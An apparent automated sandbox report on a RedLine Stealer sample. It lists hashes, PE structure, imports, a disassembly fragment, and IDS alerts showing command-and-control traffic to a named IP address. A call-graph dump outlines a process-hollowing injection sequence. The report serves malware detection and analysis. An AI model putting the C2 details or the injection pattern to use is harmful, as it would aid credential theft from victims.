                                                                                                                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHjW:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxM
                                                                                                                                                                                          MD5:E787CF7FE6F73C60B1ADCB6CFE9A2FAE
                                                                                                                                                                                          SHA1:CF44D405D677875BC3AC3A41336DA6C8F3E58277
                                                                                                                                                                                          SHA-256:6332B18367739773EAA1686C22A11DCEAD2D7314EBCEE5510F5E6A799A301203
                                                                                                                                                                                          SHA-512:8C7213E33F6A56744FAED770ECC85BFC0F9DF1EA07249CFA6FDFD1EB0822F0ADD47BB072EE21CA6442D03A1E44FE2613BFC4FFC4B72B029F33AA292A390F023B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):7.344808175573031
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          File size:221696
                                                                                                                                                                                          MD5:34a852c0f62294480e1e6e154b00539a
                                                                                                                                                                                          SHA1:6204b0e10eaf8094da16cb5ca7c325f1dbfa97f0
                                                                                                                                                                                          SHA256:f461d11f2fac14f49aeedd66999b404cfce4138d27fe7e1da79f0aa85eee5149
                                                                                                                                                                                          SHA512:3d1edf618361a6544937b7c2e5f74bc0d7793d5eb1738ccc3a5d47cf1819efd6ca4bd4bd55d883b7826ee59c6dd6287b5a611d4d4dcdd7a788e260a2c821bea4
                                                                                                                                                                                          SSDEEP:3072:ehbc8yCxsFNcEyyrJ9WU4khLTvPZFzD0yfZNuzK/hRp1d53CDX5dINLqVqU:VCxGNp7FUyf2AhZjwINut
                                                                                                                                                                                          TLSH:F124CF1AF5621232DE6AE0F855C1CBD4603D66B2AF81400A7F2D0F7F6D3A0D7729635A
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v...$...v...$...v.......v...$...v.......v..ty...v...v...v.......v...$...v.......v..Rich.v..........PE..L...X..c...
                                                                                                                                                                                          Icon Hash:00828e8e8686b000
                                                                                                                                                                                          Entrypoint:0x406252
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows cui
                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x63860258 [Tue Nov 29 13:00:08 2022 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:bcac65c952b8ab1f885fe93835602555
                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007FF934D37E1Ah
                                                                                                                                                                                          jmp 00007FF934D35A49h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                          push 00436BA0h
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          call 00007FF934D37E9Ah
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          ret
                                                                                                                                                                                          mov dword ptr [ecx], 00410B84h
                                                                                                                                                                                          jmp 00007FF934D37EFFh
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          push esi
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          call 00007FF934D37EECh
                                                                                                                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                                          je 00007FF934D35BA9h
                                                                                                                                                                                          push esi
                                                                                                                                                                                          call 00007FF934D37F55h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          mov esi, ecx
                                                                                                                                                                                          call 00007FF934D37E6Bh
                                                                                                                                                                                          mov dword ptr [esi], 00410B84h
                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          retn 0004h
                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                                          jmp 00007FF934D35BAFh
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          call 00007FF934D3818Fh
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FF934D35BB1h
                                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                                          call 00007FF934D380A9h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FF934D35B88h
                                                                                                                                                                                          leave
                                                                                                                                                                                          ret
                                                                                                                                                                                          test byte ptr [00437C08h], 00000001h
                                                                                                                                                                                          mov esi, 00437BFCh
                                                                                                                                                                                          jne 00007FF934D35BBBh
                                                                                                                                                                                          or dword ptr [00437C08h], 01h
                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                          call 00007FF934D35AF9h
                                                                                                                                                                                          push 0040F8B3h
                                                                                                                                                                                          call 00007FF934D38016h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          push esi
                                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                          call 00007FF934D45B32h
                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                                          • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x128a40x50.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x390000x600.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x150 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe8c7 | 0xea00 | False | 0.5349726228632479 | data | 6.652448585777237 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x3092 | 0x3200 | False | 0.48296875 | data | 6.068435754636973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x247d8 | 0x23c00 | False | 0.7369017701048951 | Alpha compressed COFF | 7.268563044922397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x39000 | 0x600 | 0x600 | False | 0.455078125 | data | 3.9776323787735532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x39200 | 0x3fc | data | English | United States
RT_MANIFEST | 0x390a0 | 0x15a | ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | GetLogicalDrives, CreateEventW, GetProcessHeap, QueryPerformanceFrequency, AreFileApisANSI, GetVersion, CreateFileW, GetCurrentProcess, CreateMutexW, IsProcessorFeaturePresent, FreeConsole, MultiByteToWideChar, GetModuleHandleA, GetProcAddress, GetCommandLineA, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapAlloc, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSectionAndSpinCount, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
WINSPOOL.DRV | FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification, FindNextPrinterChangeNotification, WritePrinter, ScheduleJob
COMCTL32.dll | ImageList_Remove, ImageList_ReplaceIcon, InitCommonControlsEx, ImageList_Destroy, ImageList_Create, ImageList_SetBkColor, CreateToolbarEx
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-16:50:39.536972 | TCP | 2850027 | ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init | 49699 | 32796 | 192.168.2.5 | 193.106.191.138
11/29/22-16:51:03.828285 | TCP | 2850286 | ETPRO TROJAN Redline Stealer TCP CnC Activity | 49699 | 32796 | 192.168.2.5 | 193.106.191.138
11/29/22-16:50:41.373927 | TCP | 2850353 | ETPRO MALWARE Redline Stealer TCP CnC - Id1Response | 32796 | 49699 | 193.106.191.138 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP


                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:16:50:17
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.7840.9995.exe
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:221696 bytes
                                                                                                                                                                                          MD5 hash:34A852C0F62294480E1E6E154B00539A
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.318847444.00000000005E2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:16:50:17
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7fcd70000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:16:50:18
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe
                                                                                                                                                                                          Imagebase:0x1320000
                                                                                                                                                                                          File size:2688096 bytes
                                                                                                                                                                                          MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.420283444.0000000007573000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.422192402.0000000007777000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:16:51:05
                                                                                                                                                                                          Start date:29/11/2022
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7fcd70000
                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:21%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.4%
                                                                                                                                                                                            Signature Coverage:11.1%
                                                                                                                                                                                            Total number of Nodes:1441
                                                                                                                                                                                            Total number of Limit Nodes:21
6434->6435 6435->6431 6437 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6436->6437 6438 408c4b 6437->6438 6439 408c74 6438->6439 6440 408c56 GetOEMCP 6438->6440 6441 408c79 GetACP 6439->6441 6442 408c66 6439->6442 6440->6442 6441->6442 6442->6413 6442->6415 6444 408c37 getSystemCP 78 API calls 6443->6444 6445 408cd3 6444->6445 6446 408cde setSBCS 6445->6446 6449 408d22 IsValidCodePage 6445->6449 6451 408d47 _memset __setmbcp_nolock 6445->6451 6447 409eb4 __atodbl_l 5 API calls 6446->6447 6448 408e96 6447->6448 6448->6418 6448->6420 6449->6446 6450 408d34 GetCPInfo 6449->6450 6450->6446 6450->6451 6456 408a00 GetCPInfo 6451->6456 6589 40a1b0 LeaveCriticalSection 6453->6589 6455 409000 6455->6415 6457 408ae6 6456->6457 6459 408a34 _memset 6456->6459 6462 409eb4 __atodbl_l 5 API calls 6457->6462 6466 40c24f 6459->6466 6464 408b91 6462->6464 6464->6451 6465 40c050 ___crtLCMapStringA 101 API calls 6465->6457 6467 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6466->6467 6468 40c262 6467->6468 6476 40c095 6468->6476 6471 40c050 6472 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 6471->6472 6473 40c063 6472->6473 6542 40bcab 6473->6542 6477 40c0e1 6476->6477 6478 40c0b6 GetStringTypeW 6476->6478 6480 40c1c8 6477->6480 6481 40c0ce 6477->6481 6479 40c0d6 GetLastError 6478->6479 6478->6481 6479->6477 6504 40ef07 GetLocaleInfoA 6480->6504 6482 40c11a MultiByteToWideChar 6481->6482 6499 40c1c2 6481->6499 6487 40c147 6482->6487 6482->6499 6484 409eb4 __atodbl_l 5 API calls 6486 408aa1 6484->6486 6486->6471 6490 40c15c _memset __alloca_probe_16 6487->6490 6491 4087e9 _malloc 66 API calls 6487->6491 6488 40c219 GetStringTypeA 6489 40c234 6488->6489 6488->6499 6494 40a989 type_info::_Type_info_dtor 66 API calls 6489->6494 6493 40c195 MultiByteToWideChar 6490->6493 6490->6499 6491->6490 6496 40c1ab GetStringTypeW 6493->6496 6497 40c1bc 6493->6497 6494->6499 6496->6497 6500 40bc8b 6497->6500 6499->6484 6501 40bc97 6500->6501 6502 40bca8 6500->6502 6501->6502 6503 40a989 
type_info::_Type_info_dtor 66 API calls 6501->6503 6502->6499 6503->6502 6505 40ef35 6504->6505 6506 40ef3a 6504->6506 6508 409eb4 __atodbl_l 5 API calls 6505->6508 6535 40f13c 6506->6535 6509 40c1ec 6508->6509 6509->6488 6509->6499 6510 40ef50 6509->6510 6511 40ef90 GetCPInfo 6510->6511 6515 40f01a 6510->6515 6512 40f005 MultiByteToWideChar 6511->6512 6513 40efa7 6511->6513 6512->6515 6519 40efc0 _strlen 6512->6519 6513->6512 6516 40efad GetCPInfo 6513->6516 6514 409eb4 __atodbl_l 5 API calls 6518 40c20d 6514->6518 6515->6514 6516->6512 6517 40efba 6516->6517 6517->6512 6517->6519 6518->6488 6518->6499 6520 4087e9 _malloc 66 API calls 6519->6520 6521 40eff2 _memset __alloca_probe_16 6519->6521 6520->6521 6521->6515 6522 40f04f MultiByteToWideChar 6521->6522 6523 40f086 6522->6523 6524 40f067 6522->6524 6525 40bc8b __freea 66 API calls 6523->6525 6526 40f08b 6524->6526 6527 40f06e WideCharToMultiByte 6524->6527 6525->6515 6528 40f096 WideCharToMultiByte 6526->6528 6529 40f0aa 6526->6529 6527->6523 6528->6523 6528->6529 6530 40aa5c __calloc_crt 66 API calls 6529->6530 6531 40f0b2 6530->6531 6531->6523 6532 40f0bb WideCharToMultiByte 6531->6532 6532->6523 6533 40f0cd 6532->6533 6534 40a989 type_info::_Type_info_dtor 66 API calls 6533->6534 6534->6523 6538 40f6da 6535->6538 6539 40f6f3 6538->6539 6540 40f4ab strtoxl 90 API calls 6539->6540 6541 40f14d 6540->6541 6541->6505 6543 40bccc LCMapStringW 6542->6543 6547 40bce7 6542->6547 6544 40bcef GetLastError 6543->6544 6543->6547 6544->6547 6545 40bee5 6549 40ef07 ___ansicp 90 API calls 6545->6549 6546 40bd41 6548 40bd5a MultiByteToWideChar 6546->6548 6571 40bedc 6546->6571 6547->6545 6547->6546 6556 40bd87 6548->6556 6548->6571 6551 40bf0d 6549->6551 6550 409eb4 __atodbl_l 5 API calls 6552 408ac1 6550->6552 6553 40c001 LCMapStringA 6551->6553 6554 40bf26 6551->6554 6551->6571 6552->6465 6588 40bf5d 6553->6588 6557 40ef50 ___convertcp 73 API calls 6554->6557 6555 40bdd8 MultiByteToWideChar 6559 40bdf1 LCMapStringW 
6555->6559 6582 40bed3 6555->6582 6561 4087e9 _malloc 66 API calls 6556->6561 6566 40bda0 __alloca_probe_16 6556->6566 6558 40bf38 6557->6558 6562 40bf42 LCMapStringA 6558->6562 6558->6571 6564 40be12 6559->6564 6559->6582 6560 40c028 6568 40a989 type_info::_Type_info_dtor 66 API calls 6560->6568 6560->6571 6561->6566 6573 40bf64 6562->6573 6562->6588 6563 40bc8b __freea 66 API calls 6563->6571 6567 40be1b 6564->6567 6575 40be44 6564->6575 6565 40a989 type_info::_Type_info_dtor 66 API calls 6565->6560 6566->6555 6566->6571 6572 40be2d LCMapStringW 6567->6572 6567->6582 6568->6571 6569 40bf75 _memset __alloca_probe_16 6581 40bfb3 LCMapStringA 6569->6581 6569->6588 6570 40be5f __alloca_probe_16 6574 40be93 LCMapStringW 6570->6574 6570->6582 6571->6550 6572->6582 6573->6569 6577 4087e9 _malloc 66 API calls 6573->6577 6578 40beab WideCharToMultiByte 6574->6578 6579 40becd 6574->6579 6575->6570 6576 4087e9 _malloc 66 API calls 6575->6576 6576->6570 6577->6569 6578->6579 6580 40bc8b __freea 66 API calls 6579->6580 6580->6582 6583 40bfd3 6581->6583 6584 40bfcf 6581->6584 6582->6563 6586 40ef50 ___convertcp 73 API calls 6583->6586 6587 40bc8b __freea 66 API calls 6584->6587 6586->6584 6587->6588 6588->6560 6588->6565 6589->6455 6591 406e93 6590->6591 6592 407d16 __encode_pointer 6 API calls 6591->6592 6593 406eab 6591->6593 6592->6591 6593->5678 6597 408747 6594->6597 6596 408790 6596->5680 6598 408753 type_info::_Type_info_dtor 6597->6598 6605 40702c 6598->6605 6604 408774 type_info::_Type_info_dtor 6604->6596 6606 40a28a __lock 66 API calls 6605->6606 6607 407033 6606->6607 6608 40865c 6607->6608 6609 407d91 __decode_pointer 6 API calls 6608->6609 6610 408670 6609->6610 6611 407d91 __decode_pointer 6 API calls 6610->6611 6612 408680 6611->6612 6619 408703 6612->6619 6628 40bbe8 6612->6628 6614 407d16 __encode_pointer 6 API calls 6615 4086f8 6614->6615 6617 407d16 __encode_pointer 6 API calls 6615->6617 6616 40869e 6620 4086c2 6616->6620 6624 4086ea 6616->6624 6641 40aaa8 
6616->6641 6617->6619 6625 40877d 6619->6625 6620->6619 6621 40aaa8 __realloc_crt 72 API calls 6620->6621 6622 4086d8 6620->6622 6621->6622 6622->6619 6623 407d16 __encode_pointer 6 API calls 6622->6623 6623->6624 6624->6614 6690 407035 6625->6690 6629 40bbf4 type_info::_Type_info_dtor 6628->6629 6630 40bc21 6629->6630 6631 40bc04 6629->6631 6633 40bc62 HeapSize 6630->6633 6635 40a28a __lock 66 API calls 6630->6635 6632 409c95 _strcat_s 66 API calls 6631->6632 6634 40bc09 6632->6634 6637 40bc19 type_info::_Type_info_dtor 6633->6637 6636 4094ac _strcat_s 6 API calls 6634->6636 6638 40bc31 ___sbh_find_block 6635->6638 6636->6637 6637->6616 6646 40bc82 6638->6646 6644 40aab1 6641->6644 6643 40aaf0 6643->6620 6644->6643 6645 40aad1 Sleep 6644->6645 6650 40ebb3 6644->6650 6645->6644 6649 40a1b0 LeaveCriticalSection 6646->6649 6648 40bc5d 6648->6633 6648->6637 6649->6648 6651 40ebbf type_info::_Type_info_dtor 6650->6651 6652 40ebd4 6651->6652 6653 40ebc6 6651->6653 6655 40ebe7 6652->6655 6656 40ebdb 6652->6656 6654 4087e9 _malloc 66 API calls 6653->6654 6677 40ebce type_info::_Type_info_dtor _realloc 6654->6677 6662 40ed59 6655->6662 6673 40ebf4 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 6655->6673 6657 40a989 type_info::_Type_info_dtor 66 API calls 6656->6657 6657->6677 6658 40ed8c 6661 4088c2 _malloc 6 API calls 6658->6661 6659 40ed5e HeapReAlloc 6659->6662 6659->6677 6660 40a28a __lock 66 API calls 6660->6673 6663 40ed92 6661->6663 6662->6658 6662->6659 6664 40edb0 6662->6664 6666 4088c2 _malloc 6 API calls 6662->6666 6669 40eda6 6662->6669 6665 409c95 _strcat_s 66 API calls 6663->6665 6667 409c95 _strcat_s 66 API calls 6664->6667 6664->6677 6665->6677 6666->6662 6668 40edb9 GetLastError 6667->6668 6668->6677 6671 409c95 _strcat_s 66 API calls 6669->6671 6684 40ed27 6671->6684 6672 40ec7f HeapAlloc 6672->6673 6673->6658 6673->6660 6673->6672 6675 40ecd4 HeapReAlloc 6673->6675 6676 40b6b4 ___sbh_alloc_block 5 API calls 6673->6676 6673->6677 6678 
4088c2 _malloc 6 API calls 6673->6678 6679 40ed3f 6673->6679 6681 40ed22 6673->6681 6685 40af05 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 6673->6685 6686 40ecf7 6673->6686 6674 40ed2c GetLastError 6674->6677 6675->6673 6676->6673 6677->6644 6678->6673 6679->6677 6680 409c95 _strcat_s 66 API calls 6679->6680 6682 40ed4c 6680->6682 6683 409c95 _strcat_s 66 API calls 6681->6683 6682->6668 6682->6677 6683->6684 6684->6674 6684->6677 6685->6673 6689 40a1b0 LeaveCriticalSection 6686->6689 6688 40ecfe 6688->6673 6689->6688 6693 40a1b0 LeaveCriticalSection 6690->6693 6692 40703c 6692->6604 6693->6692 6695 403284 6694->6695 6696 403430 6695->6696 6729 4018a0 6695->6729 6696->5685 6696->5686 6696->5687 6698 4033cf 6733 403140 6698->6733 6703 4034c0 FindFirstPrinterChangeNotification 6702->6703 6704 403500 6703->6704 6781 403570 FindFirstPrinterChangeNotification 6704->6781 6706 40350f 6706->5689 6707->5697 6708->5702 6709->5701 6710->5699 6712 403520 FindClosePrinterChangeNotification 6711->6712 6713 40601e 6712->6713 6713->5706 6714->5709 6715->5711 6717 403551 6716->6717 6717->5719 6718->5725 6719->5735 6720->5742 6721->5750 6722->5757 6724 403520 FindClosePrinterChangeNotification 6723->6724 6725 405fc9 6724->6725 6725->5745 6726->5730 6727->5725 6728->5718 6730 4018d1 GetModuleHandleA 6729->6730 6732 402990 6730->6732 6732->6698 6755 406048 6733->6755 6736 414189 6737 41471d 6736->6737 6738 41419f 6736->6738 6737->6696 6738->6737 6779 414154 GetPEB 6738->6779 6740 414230 6741 414154 GetPEB 6740->6741 6742 41423b 6741->6742 6742->6737 6743 414452 CreateProcessW 6742->6743 6746 4144c5 VirtualAlloc 6742->6746 6748 414618 WriteProcessMemory 6742->6748 6750 4146c7 VirtualFree 6742->6750 6754 414697 VirtualProtectEx 6742->6754 6743->6742 6744 414475 GetThreadContext 6743->6744 6744->6742 6745 41448a ReadProcessMemory 6744->6745 6745->6742 6746->6742 6747 4144e2 VirtualAllocEx 6746->6747 6747->6742 6748->6742 6749 414630 VirtualProtectEx 6748->6749 
